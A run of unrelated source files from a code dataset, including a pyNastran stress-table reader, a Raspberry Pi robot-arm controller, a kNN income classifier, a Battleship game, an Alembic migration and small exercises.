self.setNullNonlinearFactor()\n elif self.analysis_code == 2: # normal modes/buckling (real eigenvalues)\n ## mode number\n self.mode = self.add_data_parameter(data, 'mode', 'i', 5)\n ## real eigenvalue\n self.eign = self.add_data_parameter(data, 'eign', 'f', 6, False)\n self.dataNames = self.apply_data_code_value('dataNames', ['mode', 'eign'])\n #elif self.analysis_code == 3: # differential stiffness\n #elif self.analysis_code == 4: # differential stiffness\n #elif self.analysis_code == 5: # frequency\n elif self.analysis_code == 6: # transient\n ## time step\n self.time = self.add_data_parameter(data, 'time', 'f', 5)\n self.dataNames = self.apply_data_code_value('dataNames', ['time'])\n #elif self.analysis_code == 7: # pre-buckling\n #elif self.analysis_code == 8: # post-buckling\n #elif self.analysis_code == 9: # complex eigenvalues\n elif self.analysis_code == 10: # nonlinear statics\n ## load step\n self.lftsfq = self.add_data_parameter(data, 'lftsfq', 'f', 5)\n self.dataNames = self.apply_data_code_value('dataNames', ['lftsfq'])\n #elif self.analysis_code == 11: # old geometric nonlinear 
statics\n #elif self.analysis_code == 12: # contran ? (may appear as aCode=6) --> straight from DMAP...grrr...\n else:\n raise RuntimeError('invalid analysis_code...analysis_code=%s' % self.analysis_code)\n\n #print \"*isubcase=%s\" % (self.isubcase)\n #print \"analysis_code=%s table_code=%s thermal=%s\" %(self.analysis_code,self.table_code,self.thermal)\n\n #print self.code_information()\n if self.debug:\n self.binary_debug.write(' approach_code = %r\\n' % self.approach_code)\n self.binary_debug.write(' tCode = %r\\n' % self.tCode)\n self.binary_debug.write(' isubcase = %r\\n' % self.isubcase)\n self._read_title(data)\n self._write_debug_bits()\n\n def _read_ogs1_4(self, data):\n if self.read_mode == 1:\n return len(data)\n\n if self.table_code == 26: # OGS1 - grid point stresses - surface\n assert self.table_name in ['OGS1'], 'table_name=%s table_code=%s' % (self.table_name, self.table_code)\n n = self._read_ogs1_table26(data)\n elif self.table_code == 27: # OGS1 - grid point stresses - volume direct\n assert self.table_name in ['OGS1'], 'table_name=%s table_code=%s' % (self.table_name, self.table_code)\n n = self._read_ogs1_table27(data)\n elif self.table_code == 28: # OGS1- grid point stresses - principal\n assert self.table_name in ['OGS1'],'table_name=%s table_code=%s' % (self.table_name,self.table_code)\n n = self._read_ogs1_table28(data)\n #elif self.table_code == 35: # OGS - Grid point stress discontinuities (plane strain)\n #n = self._not_implemented_or_skip(data, msg)\n else:\n raise NotImplementedError(self.table_code)\n return n\n\n def _read_ogs1_table28(self, data):\n if self.num_wide == 15:\n pass\n else:\n raise NotImplementedError(self.num_wide)\n return len(data)\n\n def _read_ogs1_table26(self, data):\n resultName = 'gridPointStresses'\n if self.num_wide == 11: # real/random\n #self.create_transient_object(self.gridPointStresses, GridPointStressesObject)\n n = self._readOGS1_table26_numWide11(data)\n else:\n msg = 'only num_wide=11 is allowed num_wide=%s' % self.num_wide\n raise RuntimeError(msg)\n return n\n\n def _readOGS1_table26_numWide11(self, data): # surface stresses\n #dt = self.nonlinear_factor\n format1 = b'2i4s8f'\n s = Struct(format1)\n\n n = 0\n nelements = len(data) // 44 # 11*4\n for i in range(nelements):\n edata = data[n:n+44]\n out = s.unpack(edata)\n (ekey, eid, fiber, nx, ny, txy, angle, major,\n minor, tmax, ovm) = out\n nid = (ekey - self.device_code) // 10\n #fiber = fiber.decode('utf-8').strip()\n assert nid > 0, nid\n #self.obj.add(dt, nid, eid, fiber, nx, ny, txy,\n # angle, major, minor, tmax, ovm)\n return n\n\n def _read_ogs1_table27(self, data): # OGS1 - grid point stresses - volume direct\n #is_sort1 = self.is_sort1()\n if self.num_wide == 9: # real/random\n resultName = 'gridPointVolumeStresses'\n #self.create_transient_object(self.gridPointVolumeStresses, GridPointStressesVolumeObject)\n n = self._readOGS1_table27_numWide9(data)\n else:\n msg = 'only num_wide=9 is allowed num_wide=%s' % self.num_wide\n raise RuntimeError(msg)\n return n\n\n def _readOGS1_table27_numWide9(self, data): # surface stresses\n format1 = b'2i7f'\n s = Struct(format1)\n\n n = 0\n nelements = len(data) // 36 # 9*4\n for i in range(nelements):\n edata = data[n:n+36]\n out = unpack(format1, edata)\n (ekey, nx, ny, nz, txy, tyz, txz, pressure, ovm) = out\n nid = (ekey - self.device_code) // 10\n assert nid > 0, nid\n #check_nid\n #self.obj.add(dt, nid, nx, ny, nz, txy, tyz, txz, pressure, ovm)\n return 
n\n","sub_path":"pyNastran/op2/tables/ogs.py","file_name":"ogs.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385349634","text":"#!/usr/bin/python3\n\n\"\"\"\nCalibrate arm first!\n\"\"\"\n\nimport drv8825\nimport steppers\nimport RPi.GPIO as GPIO\nimport time\nimport sympy as sp\nfrom multiprocessing import Process\n\n# TODO use steppers instead of drv8825\n\nclass arm():\n \"\"\"\n \"\"\"\n\n def __init__( self, motionOnSeparateThread = False ):\n self.motionOnSeparateThread = motionOnSeparateThread\n self.turntable = drv8825.drv8825( pinDir = 38, pinStep = 40, pinEnable = 32, waitingTime=0.0005 )\n self.cantilever = drv8825.drv8825( pinDir = 29, pinStep = 31, pinEnable= 32, waitingTime=0.002 )\n self.anchorpoint = drv8825.drv8825( pinDir = 33, pinStep = 35, pinEnable= 32, waitingTime=0.0002 )\n\n self.pinServo = 7 #bcm: 4\n\n GPIO.setmode( GPIO.BOARD )\n GPIO.setup( self.pinServo, GPIO.OUT )\n self.p = GPIO.PWM( self.pinServo, 50 )\n self.p.start( 2.5 )\n\n self.offset = 63 #height of cart\n\n self.stepsTurnTable = 0\n self.stepsCantilever = 0\n self.stepsAnchorpoint = 0\n \n self.angleTurnTable = 0\n self.angleCantilever = 0\n self.angleAnchorpoint = 0\n self.angleGripper = 0\n\n print( \"inititalized arm\" )\n\n def __updateAngleRos__( self, angleName, angle, maxAngle, timePerRev ):\n \"\"\"\n Continuously updates the angles s.t. ros can turn the coordinate \n systems in real time.\n \"\"\"\n #now = time()\n #future = now+angle/maxAngle*timePerRev\n #cutoff = now\n #while now-cutoff < future-cutoff:\n # #print( now-cutoff, future-cutoff, now-cutoff < future-cutoff )\n # setattr( self, angleName, sp.N(sp.rad(sp.N((now-cutoff)/(future-cutoff)*angle)) ) )\n # #print( \"getAttr\", getattr( self, angleName ) )\n # #print( \"------>\", sp.N(sp.rad(sp.N((now-cutoff)/(future-cutoff)*angle)) ))\n # rclpy.sleep(0.1)\n # now = time()\n setattr( self, angleName, sp.N(sp.rad(angle)))\n\n def _stepTurntable(self, delta):\n if delta >= 0 :\n self.turntable.doStep( delta, 1 )\n else:\n self.turntable.doStep( -delta, 0 )\n\n #17300 steps over all\n def _setAngleTurntable( self, angle, spawn ):\n assert( angle >= 0 and angle <= 270 )\n steps = 17300/270*angle\n delta = steps-self.stepsTurnTable\n if spawn:\n f = lambda: self._stepTurntable(delta)\n p1 = Process(target = f)\n p1.start()\n p1.join()\n else:\n self._stepTurntable(delta)\n self.stepsTurnTable = steps\n self.__updateAngleRos__( \"angleTurnTable\", angle, 270, 10 )\n \n def setAngleTurntable( self, angle ):\n self._setAngleTurntable(angle, self.motionOnSeparateThread)\n\n def getConfigurationMatrixTurntable( self ):\n #angle = sp.rad(270*self.stepsTurnTable/17300)\n angle = self.angleTurnTable\n M = sp.Matrix( [ [sp.cos( angle ), -sp.sin( angle ), 0, 0], [sp.sin(angle), sp.cos(angle), 0, 0], [0, 0, 1, self.offset], [0, 0, 0, 1] ] )\n #print( \"caa turn>>\", M)\n return M\n\n def _stepCantilever( self, delta):\n if delta >= 0 :\n self.cantilever.doStep( delta, 0 )\n else:\n self.cantilever.doStep( -delta, 1 )\n\n #5600 steps over all\n def _setAngleCantilever( self, angle, spawn ):\n assert( angle >= -30 and angle <= 270 )\n steps = 5400/270*angle\n delta = steps-self.stepsCantilever\n if spawn:\n f = lambda: self._stepCantilever(delta)\n p1 = Process(target = f)\n p1.start()\n p1.join()\n else:\n self._stepCantilever(delta)\n self.stepsCantilever = steps\n self.__updateAngleRos__( \"angleCantilever\", angle, 270, 10 )\n \n def 
setAngleCantilever( self, angle ):\n self._setAngleCantilever(angle, self.motionOnSeparateThread)\n\n def getConfigurationMatrixCantilever( self ):\n #angle = sp.rad(270*self.stepsCantilever/5400)\n angle = self.angleCantilever-120\n M = sp.Matrix( [ [1, 0, 0, 0], [0, sp.cos(angle), -sp.sin(angle), 0], [0, sp.sin(angle), sp.cos(angle), 144], [0, 0, 0, 1] ] )\n #print( \"caa cant>>\", M)\n return M\n\n def _stepAnchorPoint(self, delta):\n if delta >= 0 :\n self.anchorpoint.doStep( delta, 1 )\n else:\n self.anchorpoint.doStep( -delta, 0 )\n\n def _setAngleAnchorPoint( self, angle, spawn ):\n assert( angle >= -30 and angle <= 270 )\n steps = 5400/270*angle*5\n delta = steps-self.stepsAnchorpoint\n if spawn:\n f = lambda: self._stepAnchorPoint(delta)\n p1 = Process(target = f)\n p1.start()\n p1.join()\n else:\n self._stepAnchorPoint(delta)\n self.stepsAnchorpoint = steps\n self.__updateAngleRos__( \"angleAnchorpoint\", -angle, 300, 10 )\n\n def setAngleAnchorPoint( self, angle ):\n self._setAngleAnchorPoint(angle, self.motionOnSeparateThread)\n\n def getConfigurationMatrixAnchorPoint( self ):\n #angle = sp.rad(270*self.stepsAnchorpoint/5400)\n angle = self.angleAnchorpoint+120\n M = sp.Matrix( [ [1, 0, 0, 0], [0, sp.cos(angle), -sp.sin(angle), 0], [0, sp.sin(angle), sp.cos(angle), 225], [0, 0, 0, 1] ] )\n #print( \"caa ap>>\", M)\n return M\n\n\n def grip( self, cycle ):\n assert( cycle > 5 and cycle < 12.5 )\n self.p.ChangeDutyCycle( cycle )\n time.sleep( 2 )\n #self.__updateAngleRos__( \"angleGripper\", -angle, 270, 10 )\n\n def getConfigurationMatrixGripper( self ):\n #angle = sp.rad(270*self.stepsAnchorpoint/5400)\n #angle = self.angleGripper+120\n angle=0\n M = sp.Matrix( [ [1, 0, 0, 0], [0, sp.cos(angle), -sp.sin(angle), 0], [0, sp.sin(angle), sp.cos(angle), 200], [0, 0, 0, 1] ] )\n #print( \"caa grip>>\", M)\n return M\n\n\n # Motion Primitives\n\n def rotateAndGrab( self, angle ):\n self.setAngleCantilever( 30 )\n self.setAngleTurntable( angle )\n self.setAngleCantilever( 0 )\n\n def retractArm( self ):\n f = lambda: self._setAngleCantilever( 0, False )\n g = lambda: self._setAngleTurntable( 0, False ) \n h = lambda: self._setAngleAnchorPoint( 0, False )\n p1 = Process(target = f)\n p2 = Process(target = g)\n p3 = Process(target = h)\n p1.start()\n p2.start()\n p3.start()\n p1.join()\n p2.join()\n p3.join()\n self.stepsAnchorpoint = 0\n self.stepsTurnTable = 0\n self.stepsCantilever = 0\n self.__updateAngleRos__( \"angleTurnTable\", 0, 270, 0 )\n self.__updateAngleRos__( \"angleAnchorpoint\", 0, 300, 0 )\n self.__updateAngleRos__( \"angleCantilever\", 0, 270, 0 )\n\n def idle( self ):\n time.sleep(0.1)\n \n # Simple Positioning of the arm\n\n def moveToFront( self ):\n self.setAngleTurntable( 180 )\n \n def moveToLeft( self ):\n self.setAngleTurntable( 270 )\n \n def moveToRight( self ):\n self.setAngleTurntable( 60 )\n \n def moveToBack( self ):\n self.setAngleTurntable( 0 )\n","sub_path":"pgcd/nodes/motions/arm.py","file_name":"arm.py","file_ext":"py","file_size_in_byte":7145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499531266","text":"from numpy import array\nfrom numpy import linalg as LA\n\nimport math\nimport csv\nimport os\nimport numpy as np\nimport sys\nimport random\n\n# \ndef getRows(CSVPath):\n with open(CSVPath, newline='') as csvFile:\n rowReader = list(csv.reader(csvFile, delimiter=',', quotechar='|'))\n\n return rowReader\n\n\n\n#Q5.\nprint(\"--------------------------------------------------\")\nprint(\"kNN 
algorithm 4-folde cross validation:\")\nprint(\"--------------------------------------------------\")\n#Explain how this might affect your model and how you interpret the results\n\n# For instance, would you say a model that \n# achieved 70% accuracy is a good or poor model? \n#\n# yes it will be good model achieved 70% accuracy\n#\n# How many dimensions does each data point have \n# (ignoring the id attribute and class label)?\n#\n# categorial (7)\n# numerical (4)\n# ordinal (1)\n# Total 12 demensions ?\n#\n\n# # # range of workclass\n# print(train_data[0][6])\n# print(train_data[1][6:13])\n\n# getWorkSpace_categorial = train_data[1][6:12]\n# getMarried_categorial = train_data[1][13:20]\n# getOccupation_categorial = train_data[1][21:33]\n# getRelationship_categorial = train_data[1][34:40]\n\n# print(train_data[0][6:12])\n# print(train_data[0][13:20])\n# print(train_data[0][21:33])\n# print(train_data[0][34:40])\n\ndef one_hot_encoding(rawData,target_categorial):\n #get target length and find coding\n get_len = len(target_categorial)\n # print(get_len)\n g = 0\n result =0\n for i in target_categorial:\n #get each values for binary\n # 1 , 2 , 4 , 8 , 16 ...\n # 2^0, 2^1, 2^2, 2^3, 2^4 ...\n # check array is 1 or 0\n # if then add in result : 2^g\n\n if i == '1':\n result = result + (2)**int(g)\n # if not ignored\n g = g + 1\n \n return ((result-1)/(2**get_len-1))\n\n\n# # range of Married\n# print(train_data[0][14])\n# print(train_data[0][21])\n# print(train_data[1][14:21])\n\n# # range of occupation\n# print(train_data[0][22])\n# print(train_data[0][33])\n# print(train_data[1][22:33])\n\n# # range of relationship\n# print(train_data[0][34])\n# print(train_data[0][39])\n# print(train_data[1][34:39])\n\n\n# get encoded value from here!\n\ndef get_vector_Generator(id,rawData,option):\n vector_set = []\n\n # Check data - should be delete\n\n getIdCheck = rawData[id][0]\n\n\n # Numerical\n\n getAge = rawData[id][1] \n getEducation = rawData[id][2]\n getCapital_gain = rawData[id][3]\n getCapital_loss = rawData[id][4]\n getHoursPerWeek = rawData[id][5]\n\n # Categorial\n getWorkSpace_categorial= rawData[id][6:13]\n getMarried_categorial = rawData[id][13:20]\n getOccupation_categorial = rawData[id][20:34]\n getRelationship_categorial = rawData[id][34:40]\n\n\n # print(\"this is income data: \" + str(getIncomeData))\n\n # encoded\n result_Work_encoded = one_hot_encoding(rawData,getWorkSpace_categorial)\n result_Married_encoded = one_hot_encoding(rawData,getMarried_categorial)\n result_Occupation_encoded = one_hot_encoding(rawData,getOccupation_categorial)\n result_Relationship_encoded = one_hot_encoding(rawData,getRelationship_categorial)\n\n vector_set.append(int(getIdCheck))\n\n # vector_set.append section\n vector_set.append(float(getAge))\n vector_set.append(float(getEducation))\n vector_set.append(float(getCapital_gain))\n vector_set.append(float(getCapital_loss))\n vector_set.append(float(getHoursPerWeek))\n\n # vectorset by encoded\n\n # temp = []\n\n vector_set.append(float(result_Work_encoded))\n vector_set.append(float(result_Married_encoded))\n vector_set.append(float(result_Occupation_encoded))\n vector_set.append(float(result_Relationship_encoded))\n \n # Normalization function\n # append normalzed values on vector_set \n\n\n # for value in temp:\n # vector_set.append((value - np.mean(temp)) / (max(temp) - min(temp)))\n # income\n if option == 1:\n getIncomeData = rawData[id][86]\n vector_set.append(int(getIncomeData))\n # print(vector_set)\n return vector_set\n\n\n# def 
normalization(vector_set):\n# # x - mean / max - min\n# # vector_set[0] = work\n# # vector_set[1] = married\n# # vector_set[2] = occupation\n# # vector_set[3] = relationship\n\n# # normalization\n# normal_result = []\n# for value in vector_set:\n# normal_result.append(value - mean(vector_set)) / (max(vector_set) - min(vector_set))\n \n# # init vectorset again\n\n# return normal_result\n\n# print(one_hot_encoding(rawData, getWorkSpace_categorial))\n\n# get vector generation\ndef get_vector(rawData,option):\n i = 1\n vector = []\n for row in rawData[0:-1]:\n vector.append(get_vector_Generator(i,rawData,option))\n i = i + 1\n return vector\n\n\ndef kNN_decision(k, train_dataSet, validation_vector):\n sortDistanceList = []\n new_vector = []\n for each_vector in train_dataSet:\n i = 1\n distance = 0\n # get distance calculate between each_vector and ex_vector\n for i in range(1,10): # excluding id and income\n # 1 ~ 10 (which is 11 values last will INCOME)\n distance += float((each_vector[i] - float(validation_vector[i]))**2)\n distance = math.sqrt(distance)\n # print(each_vector[10])\n\n # sortDistanceList.extend(distance)\n # sortDistanceList.extend(each_vector[0])\n # sortDistanceList.extend(each_vector[10])\n\n # new_vector.append(sortDistanceList)\n\n # ----------- distance, id number , income --------\n new_vector = [distance, each_vector[0], each_vector[10]]\n\n sortDistanceList.append(new_vector)\n sortDistanceList.sort()\n # counting of income references for voting\n k_result = 0\n k_income = 0\n for vote in range(k):\n if(int(sortDistanceList[vote][2]) == 1):\n k_income += 1\n # actual decision according k\n k_result = float(k_income/k)\n if (k_result > 0.5):\n return 1\n elif (k_result < 0.5):\n return 0\n else:\n return 1\n\n\n# validation testing loop\ndef validation_loop(k, train_dataSet, validation_dataSet):\n kNN_temp = []\n kNN_result = []\n for validation_vector in validation_dataSet:\n decision = kNN_decision(k,train_dataSet,validation_vector)\n kNN_temp = [decision,validation_vector[10]]\n kNN_result.append(kNN_temp)\n \n err_score = 0\n total = 0\n i = 0\n\n # print(kNN_result)\n\n for row in kNN_result:\n # print(row)\n if ((row[0]+row[1]) == 1):\n err_score = err_score + 1\n\n # print(\"error_score :: \" + str(err_score))\n i = i + 1\n total = total + 1\n\n # Data Accuracy\n return (int(100)*float(1-(float(err_score/total)))) \n\n######################## Main ####################################\n## - if argument 1 is '-v' then\noption = sys.argv[1]\nif (option == \"-v\"):\n trainFile = sys.argv[2]\n train_data = getRows(trainFile)\n vector_train = get_vector(train_data,1)\n # vector_test = get_vector(test_data,0)\n random.shuffle(vector_train)\n\n validating_vectorSet = []\n folded_vectorSet = []\n\n numFold = 4\n nVector = int(8000/numFold)\n sum_accuracy = 0\n for curF in range(numFold): ## - it's for iterating of validation test with different fold\n validating_vectorSet = []\n folded_vectorSet = []\n for i in range(numFold): ## - it's for copy data set of folded data into test tray\n if(curF == i):\n validating_vectorSet.extend(vector_train[i*nVector:(i+1)*nVector])\n else:\n folded_vectorSet.extend(vector_train[i*nVector:(i+1)*nVector])\n print(\"validating vector set: \" + str(curF))\n print(\"the other folding vector set will be TrainSet\")\n\t ### testing under variable k \n\t #max_k = 100\n\t #i = 0\n\t #### testing fixed k\n i = 1\n\t ######\n\t #for i in range(max_k):\n k = 2*i+1\n accuracy_result = validation_loop(k, folded_vectorSet, validating_vectorSet)\n 
print(\"test result K = \" + str(k),end=\"\\n\")\n        print(\"  accuracy = \" + str(accuracy_result),end=\"%\\n\")\n        sum_accuracy += accuracy_result\n    print(\"---- total average: \"+ str(sum_accuracy) + \"/\" + str(numFold) + \"=\" + str(sum_accuracy/numFold),end=\"%\\n\")\n## - else if argument 1 is '-t' then train on the full set and write a submission\nelif (option == \"-t\"):\n    trainFile = sys.argv[2]\n    testFile = sys.argv[3]\n    train_data = getRows(trainFile)\n    test_data = getRows(testFile)\n\n    vector_train = get_vector(train_data,1)\n    vector_test = get_vector(test_data,0)\n    random.shuffle(vector_train)\n    f = open(\"kaggle_submit.csv\",\"w\")\n    f.write(\"id\" + ',' + \"income\" + '\\n')\n\n    print(\"id income\",end=\"\\n\")\n    nTestVector = 2000  # unused below; kept from the original experiment setup\n    k = 99\n\n    for each_vector in vector_test:\n        decision = kNN_decision(k,vector_train,each_vector)\n        f.write(str(each_vector[0]) + ',' + str(decision) + '\\n')\n        print(str(each_vector[0]) + \" \" + str(decision),end=\"\\n\")\n\n    f.close()\n\nelse:\n    print(\"------------------------------------------\")\n    print(\"- usage : cmd -v/-t traindata [test_data] \")\n    print(\"------------------------------------------\")\n\n\n\n#### the end of code","sub_path":"Assignment1/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"230261664","text":"#!/usr/bin/python3\n\n'''\nAuthor: Michel Zaal\nName: Battleship CLI version\nDescription: Simple CLI version of\n             the game Battleship\n'''\n\nfrom random import randint\n\nboard = []\n\nfor x in range(5):\n    board.append(['O'] * 5)\n\n\ndef print_board(board):\n    for row in board:\n        print(\" \".join(row))\n\n\nprint(\"Let's play Battleship!\\n\")\nprint_board(board)\n\n\ndef random_row(board):\n    return randint(0, len(board) - 1)\n\n\ndef random_col(board):\n    return randint(0, len(board[0]) - 1)\n\n\nship_row = random_row(board)\nship_col = random_col(board)\nprint()\n# print(ship_row)\n# print(ship_col)\n\n\ndef gues(kind):\n    try:\n        _gues = int(input(f'Guess {kind}:'))\n    except ValueError:\n        print('Try again')\n        _gues = gues(kind)  # keep asking until a number is entered\n    return int(_gues)\n\n\nfor i in range(5):\n    guess_row = gues('Row')\n    guess_col = gues('col')\n\n    if guess_row == ship_row and guess_col == ship_col:\n        print(\"\\nCongratulations! 
You sunk my battleship!\")\n        break\n    else:\n        if not (0 <= guess_row <= 4) or not (0 <= guess_col <= 4):\n            print(\"Oops, that's not even in the ocean.\")\n        elif(board[guess_row][guess_col] == \"X\"):\n            print(\"You guessed that one already.\")\n        else:\n            print(\"You missed my battleship!\")\n            board[guess_row][guess_col] = 'X'  # only mark guesses that landed on the board\n        print_board(board)\n\ninput('\\nGame over')\n","sub_path":"Applications/BattleShip/battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"286626412","text":"# Title / Difficulty\n# Fibonacci Number / Bronze III\n\nimport sys\nfrom util import DatetimeDecorator\n\ninput = lambda: sys.stdin.readline().strip()\n\n\n@DatetimeDecorator\ndef solution(n):\n    cache = [0, 1, 1] + [0 for _ in range(n - 2)]\n\n    for i in range(3, n + 1):\n        cache[i] = cache[i - 1] + cache[i - 2]\n\n    return cache[n]\n\n\nn = int(input())\nresult = solution(n)\nprint(result)\n","sub_path":"Days/2020.08.05/boj_2747_피보나치_수.py","file_name":"boj_2747_피보나치_수.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"574547118","text":"\"\"\"generate ships to a file\"\"\"\n\nimport random\n\nlista_statkow = []\n\nfor i in range(200):\n    temp_id_ship = \"\"\n    if i < 10:\n        temp_id_ship = \"S00\"+str(i)\n    elif i < 100:\n        temp_id_ship = \"S0\"+str(i)\n    else:\n        temp_id_ship = \"S\"+str(i)\n\n    # generate the dimensions for the ship\n\n    w = random.randrange(50, 101)\n    l = random.randrange(50, 101)\n    h = random.randrange(50, 101)\n\n    statek = {\n        \"id_ship\": temp_id_ship,\n        \"width_ship\": w,\n        \"height_ship\": h,\n        \"length_ship\": l,\n    }\n\n    lista_statkow.append(statek)\n\n\nprint(lista_statkow)\n\nplik = open(\"statki.txt\", 'w')\ntry:\n    #plik.writelines(str(lista_statkow))\n\n    for i in lista_statkow:\n        plik.writelines(str(i) + '\\n')\n\n\n\nfinally:\n    plik.close()\n\n\n\"\"\"generate containers to a file\"\"\"\n\n\nlista_kontenerow = []\n\n# generate the height for the containers\n# (drawn once, outside the loop, so all 1000 containers share one height)\nh = random.randrange(1, 41)\n\nfor i in range(1000):\n    temp_id_container = \"\"\n    if i < 10:\n        temp_id_container = \"C00\"+str(i)\n    elif i < 100:\n        temp_id_container = \"C0\"+str(i)\n    else:\n        temp_id_container = \"C\"+str(i)\n\n    # generate the remaining dimensions for the container\n\n    w = random.randrange(1, 41)\n    l = random.randrange(1, 41)\n\n    kontener = {\n        \"id_container\": temp_id_container,\n        \"width_container\": w,\n        \"height_container\": h,\n        \"length_container\": l,\n    }\n\n    lista_kontenerow.append(kontener)\n\n\nprint(lista_kontenerow)\n\nplik = open(\"kontenery.txt\", 'w')\ntry:\n    #plik.write(str(lista_kontenerow) + '\\n')\n    for i in lista_kontenerow:\n        plik.writelines(str(i) + '\\n')\nfinally:\n    plik.close()","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"645658334","text":"\"\"\"empty message\n\nRevision ID: 41bc1a3d3957\nRevises: adefb3c0e94e\nCreate Date: 2020-01-17 09:38:05.709944\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '41bc1a3d3957'\ndown_revision = 'adefb3c0e94e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###
\n    op.create_table('sports',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('player_id', sa.Integer(), nullable=False),\n    sa.Column('tennis', sa.Boolean(), nullable=False),\n    sa.Column('tennis_ability', sa.String(length=20), nullable=False),\n    sa.Column('squash', sa.Boolean(), nullable=False),\n    sa.Column('squash_ability', sa.String(length=20), nullable=False),\n    sa.Column('table_tennis', sa.Boolean(), nullable=False),\n    sa.Column('table_tennis_ability', sa.String(length=20), nullable=False),\n    sa.Column('badminton', sa.Boolean(), nullable=False),\n    sa.Column('badminton_ability', sa.String(length=20), nullable=False),\n    sa.Column('created_at', sa.DateTime(), nullable=True),\n    sa.Column('modified_at', sa.DateTime(), nullable=True),\n    sa.ForeignKeyConstraint(['player_id'], ['players.id'], ),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('player_id')\n    )\n    op.create_unique_constraint(None, 'photos', ['user_id'])\n    op.alter_column('players', 'ability',\n               existing_type=sa.VARCHAR(length=50),\n               nullable=True)\n    op.alter_column('players', 'dob',\n               existing_type=sa.DATE(),\n               nullable=True)\n    op.alter_column('players', 'gender',\n               existing_type=sa.VARCHAR(length=50),\n               nullable=True)\n    op.alter_column('players', 'rank_points',\n               existing_type=sa.INTEGER(),\n               nullable=True)\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.alter_column('players', 'rank_points',\n               existing_type=sa.INTEGER(),\n               nullable=False)\n    op.alter_column('players', 'gender',\n               existing_type=sa.VARCHAR(length=50),\n               nullable=False)\n    op.alter_column('players', 'dob',\n               existing_type=sa.DATE(),\n               nullable=False)\n    op.alter_column('players', 'ability',\n               existing_type=sa.VARCHAR(length=50),\n               nullable=False)\n    op.drop_constraint(None, 'photos', type_='unique')\n    op.drop_table('sports')\n    # ### end Alembic commands ###\n","sub_path":"migrations/versions/41bc1a3d3957_.py","file_name":"41bc1a3d3957_.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"525373973","text":"# **************************************************************************** #\n#                                                                              #\n#                                                         :::      ::::::::    #\n#    recipe.py                                          :+:      :+:    :+:    #\n#                                                     +:+ +:+         +:+      #\n#    By: eduriez                                    +#+  +:+       +#+         #\n#                                                 +#+#+#+#+#+   +#+            #\n#    Created: 2020/03/10 10:34:18 by eduriez           #+#    #+#              #\n#    Updated: 2020/03/10 12:08:44 by eduriez          ###   ########.fr        #\n#                                                                              #\n# **************************************************************************** #\n\nclass Recipe:\n\tdef __init__(self, name, cooking_lvl, cooking_time,\\\n\t\t\t\tingredients, description, recipe_type):\n\t\tif type(name) != str or not name:\n\t\t\traise Exception(\"name is required.\")\n\t\tif type(cooking_lvl) != int or type(cooking_time) != int:\n\t\t\traise Exception(\"cooking_lvl and cooking_time must be integers.\")\n\t\tif cooking_lvl < 1 or cooking_lvl > 5:\n\t\t\traise Exception(\"cooking_lvl must be between 1 and 5.\")\n\t\tif cooking_time < 0:\n\t\t\traise Exception(\"cooking_time must not be negative.\")\n\t\tif type(ingredients) != list or any(type(elem) != str or not elem for elem in ingredients):\n\t\t\traise Exception(\"ingredients must be a non-empty string list.\")\n\t\tif type(description) != str:\n\t\t\traise Exception(\"description must be a string.\")\n\t\tif recipe_type not in ['starter', 'lunch', 'dessert']:\n\t\t\traise Exception(\"recipe_type must be : starter | lunch | dessert.\")\n\t\tself.name = name\n\t\tself.cooking_lvl = 
cooking_lvl\n\t\tself.cooking_time = cooking_time\n\t\tself.ingredients = ingredients\n\t\tself.description = description\n\t\tself.recipe_type = recipe_type\n\n\tdef __str__(self):\n\t\treturn f\"recipe_name: {self.name}\\n\\\ncooking_lvl: {self.cooking_lvl}\\n\\\ncooking_time: {self.cooking_time}\\n\\\ningredients: {self.ingredients}\\n\\\ndescription: {self.description}\\n\\\nrecipe_type: {self.recipe_type}\\n\"\n","sub_path":"bootcamp_python_for_ML/D01/ex00/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"146712505","text":"import unittest\nfrom src.environment import Easy21\n\n\nclass TestEnvironment(unittest.TestCase):\n def setUp(self):\n self.env = Easy21()\n\n def test_initial_step(self):\n for i in range(10000):\n d_H, p_H = self.env.initial_step()\n self.assertLessEqual(d_H, 10)\n self.assertLessEqual(p_H, 10)\n self.assertGreaterEqual(d_H, 1)\n self.assertGreaterEqual(p_H, 1)\n\n def test_move(self):\n s = self.env.initial_step()\n s, r = self.env.step(\"hit\")\n self.assertListEqual(s, self.env._cur_state)\n\n def test_get_reward(self):\n\n d_H, p_H = 5, 5\n reward = self.env._get_reward(d_H, p_H)\n self.assertEqual(reward, 0)\n\n d_H, p_H = 22, 5\n reward = self.env._get_reward(d_H, p_H)\n self.assertEqual(reward, 1)\n\n d_H, p_H = 5, 22\n reward = self.env._get_reward(d_H, p_H)\n self.assertEqual(reward, -1)\n","sub_path":"test/test_environment.py","file_name":"test_environment.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"102387376","text":"import os\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nAPI_ID = 